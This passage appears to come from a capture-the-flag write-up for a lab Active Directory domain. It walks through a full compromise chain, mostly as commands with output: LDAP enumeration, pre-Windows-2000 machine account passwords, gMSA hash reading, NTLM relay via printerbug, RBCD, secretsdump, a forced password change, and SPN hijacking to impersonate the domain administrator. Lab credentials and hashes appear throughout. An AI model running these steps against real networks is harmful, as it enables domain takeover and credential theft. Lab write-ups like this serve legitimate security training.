rpcclient or LDAP queries), they can enumerate all usernames, group lists, and even detailed Description fields of certain users.3. Facilitating Advanced Domain Attacks
The unrestricted information gathering capability provided by the Pre-Windows 2000 Compatible Access group is the cornerstone for executing subsequent advanced attacks. Attackers can easily collect the following information to formulate attack paths:
4. Persistence & Backdoors
In Red Team Operations, if an attacker gains high privileges, they may deliberately add regular users or specific backdoor accounts to the Pre-Windows 2000 Compatible Access group. Because this is a system-built-in, seemingly "compatibility" legacy group, blue teams or system administrators often overlook it during audits, allowing attackers to maintain hidden monitoring privileges over domain information.
Remediation & Defense Measures:
As a defender or when issuing a penetration testing report, the following remediation measures should be recommended:
Everyone, Anonymous Logon, and Authenticated Users.Exploitation
Since we are in the AUTHENTICATED USERS@PIRATE.HTB group (which belongs to Pre-Windows 2000 Compatible Access), it means we can read all information
ldapsearch -x -H ldap://10.129.7.169 -D 'pentest@pirate.htb' -w 'p3nt3st2025!&' -b "DC=pirate,DC=htb" "(objectClass=user)" > all_users_attributes.txtAttempt to read leaked passwords
grep -i -E "pass|pwd|userparameters|info" all_users_attributes.txt
# Nothing gainedAttempt to read gmsa passwords
nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' --gmsa
# Account: gMSA_ADCS_prod$ NTLM: <no read permissions> PrincipalsAllowedToReadPassword: Domain Secure ServersOnly the group Domain Secure Servers can read, check which users are in it
ldapsearch -x -H ldap://10.129.7.169 -D 'pentest@pirate.htb' -w 'p3nt3st2025!&' -b "DC=pirate,DC=htb" "(&(objectCategory=group)(cn=Domain Secure Servers))" member
# Returns member: CN=MS01,CN=Computers,DC=pirate,DC=htbOnly MS01 can read it
Pre2K
A Google search reveals nxc's pre2k module.
▶Related Introduction
By default, when a computer joins a domain, the domain controller automatically generates a 120-character, fully random machine account password (usually rolling automatically every 30 days), making brute-forcing the machine account nearly impossible.
However, the Active Directory Users and Computers (ADUC) management tool retains a checkbox for compatibility with ancient NT systems: "Assign this computer account as a pre-Windows 2000 computer".
If an administrator checks this box when manually pre-creating a computer account (e.g., before assigning a physical machine, just creating a placeholder in AD), something extremely absurd happens: AD does not generate a random password; instead, it directly uses the lowercase of the computer name as its initial password!
SERVERDEMO$ is created, its password is serverdemo.MS01$; if it has this vulnerability, its password is ms01!Exploitation
nxc ldap 10.129.7.169 -u 'pentest' -p 'p3nt3st2025!&' -M pre2k
# MS01$ and EXCH01$Reading gMSA
nxc ldap DC01.pirate.htb -u 'MS01$' -p 'ms01' -k --gmsaAccount: gMSA_ADCS_prod$ NTLM: 304106f739822ea2ad8ebe23f802d078
Account: gMSA_ADFS_prod$ NTLM: 8126756fb2e69697bfcb04816e685839 USER
Connecting with evil-winrm
evil-winrm -u 'gMSA_ADCS_prod$' -H '304106f739822ea2ad8ebe23f802d078' -i DC01.pirate.htbChecking network
*Evil-WinRM* PS C:\Users> ipconfig
Windows IP Configuration
Ethernet adapter vEthernet (Switch01):
Connection-specific DNS Suffix . :
Link-local IPv6 Address . . . . . : fe80::d976:c606:587e:f1e1%8
IPv4 Address. . . . . . . . . . . : 192.168.100.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.7.169
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1Setting up a bridge with ligolo-ng
For setup instructions, see the ligolo-ng official website.
Finding live hosts
nxc smb 192.168.100.0/24SMB 192.168.100.1 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:pirate.htb) (signing:True) (SMBv1:False)
SMB 192.168.100.2 445 WEB01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:WEB01) (domain:pirate.htb) (signing:False) (SMBv1:False)Discovered WEB01 with SMB signing disabled. This indicates that NTLM relay attacks can be attempted.
Querying printers
nxc smb 192.168.100.2 -u GMSA_ADFS_PROD$ -H 8126756fb2e69697bfcb04816e685839 -M spooler
# Returns Spooler service enabledPreparing the relay
sudo impacket-ntlmrelayx -t smb://10.129.7.169 -smb2support --remove-mic -socks
# --remove-mic removes the Message Integrity CodeConfiguring forwarding in ligolo
[Agent : PIRATE\gMSA_ADFS_prod$@DC01] » listener_add --addr 0.0.0.0:8888 --to 127.0.0.1:445Executing the attack
python printerbug.py -hashes :8126756fb2e69697bfcb04816e685839 'pirate.htb/GMSA_ADFS_PROD$'@192.168.100.2 10.10.17.34After gaining access, an RBCD attack was executed, obtaining privileges on the WEB01 machine.
Using credentials XUPXYXWJ$:Mvb0i(gL8v$>{PG to obtain the administrator's TGT, then export the NTLM hash
impacket-secretsdump -k -no-pass -target-ip 192.168.100.2 WEB01.pirate.htb
# Obtains a.white : E2nvAOKSz5Xz2MJuROOT
According to BloodHound: a.white has ForceChangePassword on a.white_ADM.
bloodyAD --host 192.168.100.1 -d Pirate.htb -u a.white -p E2nvAOKSz5Xz2MJu set password 'a.white_ADM' 'P@ssword123!'
# [+] Password changed successfully!a.white_ADM belongs to the IT group and has WriteSPN permission on DC01.PIRATE, find delegation relationships.
impacket-findDelegation pirate.htb/a.white_adm:'P@ssword123!' -dc-ip 192.168.100.1AccountName AccountType DelegationType DelegationRightsTo SPN Exists
----------- ----------- ---------------------------------- --------------------- ----------
DC01$ Computer Unconstrained N/A Yes
a.white_adm Person Constrained w/ Protocol Transition http/WEB01.pirate.htb Yes
a.white_adm Person Constrained w/ Protocol Transition HTTP/WEB01 Yes
XUPXYXWJ$ Computer Resource-Based Constrained WEB01$ NoSPN Hijacking
- User
a.white_admis allowed to impersonate anyone (protocol transition) to access the HTTP service onWEB01. a.white_admhasWriteSPNpermission onDC01.
Utilizing the uniqueness of SPNs, transfer the delegation rights that should belong to WEB01 to DC01, so that a.white_adm can access DC01 as an administrator.
Remove SPN from WEB01
python3 ~/Work/Tools/krbrelayx/addspn.py -t 'WEB01$' -u 'pirate.htb\a.white_adm' -p 'P@ssword123!' 'DC01.pirate.htb' -r --spn 'http/WEB01.pirate.htb'
# Returns SPN Modified successfullyTransfer
python3 ~/Work/Tools/krbrelayx/addspn.py -t 'DC01$' -u 'pirate.htb\a.white_adm' -p 'P@ssword123!' 'dc01.pirate.htb' -s 'http/WEB01.pirate.htb'
# Returns SPN Modified successfullyObtaining the ticket
impacket-getST -spn 'http/WEB01.pirate.htb' -impersonate administrator 'pirate.htb/a.white_adm:P@ssword123!' -dc-ip 10.129.7.169 -altservice 'cifs/DC01.pirate.htb'
# Returns Saving ticket in administrator@http_WEB01.pirate.htb@PIRATE.HTB.ccache
# The -altservice parameter bypasses the protocol transition restrictionSince the TGT is long-term, the DC trusts it.
impacket-smbclient -k -no-pass DC01.pirate.htbRoot access can then be obtained.